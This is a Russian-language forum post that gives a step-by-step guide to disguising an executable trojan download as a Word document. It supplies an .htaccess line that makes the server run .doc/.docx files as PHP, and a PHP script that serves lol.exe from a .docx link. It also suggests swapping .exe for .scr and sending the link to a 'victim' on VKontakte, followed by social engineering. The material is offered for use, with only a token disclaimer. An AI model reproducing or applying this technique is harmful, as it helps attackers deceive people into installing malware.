1. Мы открыли доступ к ранее скрытому контенту.

    Вам доступно более 44 000 видео уроков, книг и программ без VIP статуса. Более подробно ЗДЕСЬ.
    Скрыть объявление

Скачать Подмена расширений на уровне сервера или впариваем троян

Тема в разделе "Разные курсы", создана пользователем d0ct0r, 13 сен 2015.

0/5, Голосов: 0

  1. d0ct0r

    d0ct0r Команда форума

    Сообщения:
    15.287
    Симпатии:
    43.935
    Подмена расширений на уровне сервера или впариваем троян

    Доброго дня/вечера/ночи.

    Сегодня мы поговорим про то, как можно подменить расширение на сервере/хостинге. Для чего это может быть использовано? Допустим вы хотите впарить определенному человеку трой, а человек ехе не принимает, тогда его сможет отвлечь этот метод. (Это был пример и он не побуждает вас совершать какие-либо противозаконные действия). Целей может быть множество.

    Объясню вкратце: У вас на сервере находится файл с названием lol.exe, который должна скачать жертва. Скидывать ссылку вида domain/lol.exe немного палевно, пугает расширение exe, а вот ссылка вида domain/lol.docx или же domain/name.doc практически не вызывает подозрений и при переходе на domain/name.docx будет скачиваться ваш заданный файл, на нашем примере — это lol.exe. После того, как вы прочитаете статью статью до конца, то вы сможете создавать свои ссылки такого.


    Ну что же, давайте приступим.

    1. Открываем блокнот, туда пишем:

    AddType application/x-httpd-php .doc .docx

    Сохраняем это, как .htaccess, затем заливаем на хостинг/сервер в корень или в ту папку, где будет находиться ваш exe файл. В моем случае — это в корень сайта. Ставим права 644 или 444.

    2. Теперь нужно создать php скрипт с расширением .doc или .docx, при обращении к которому вылезет предложение скачать ваш файл. Открываем блокнот и пишем:

    Код:
    Код:
    <?header(‘Content-Type: application/octet-stream’);header(‘Content-Disposition: attachment; filename=имя файла’);echo file_get_contents(‘путь к файлу’);?>
    Пример:

    Код:
    Код:
    <?header(‘Content-Type: application/octet-stream’);header(‘Content-Disposition: attachment; filename=lol.exe‘);echo file_get_contents(‘http://domain/lol.exe‘);?>
    Если же вы заливаете в корень, то можно написать последнюю строчку и так:

    echo file_get_contents(‘lol.exe‘);

    Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.

    Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.

    Теперь даем жертве ссылку: http://domain/name.docx, он или она переходит и скачивает файл. Также можно ссылку скинуть вконтакте, жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.

    Спасибо за внимание!
     
    Отзыв После просмотра материала "Подмена расширений на уровне сервера или впариваем троян" оставьте свою оценку и отзыв в данной теме
    hor7777 нравится это.
Сохранить в соц. сетях:
Оценить эту тему:
/5,
Похожие темы
  1. Volchek
    Ответов:
    0
    Просмотров:
    154
  2. d0ct0r
    Ответов:
    0
    Просмотров:
    99
  3. Таточка
    Ответов:
    0
    Просмотров:
    281
  4. Солнышко
    Ответов:
    0
    Просмотров:
    238
  5. Солнышко
    Ответов:
    0
    Просмотров:
    70
Загрузка...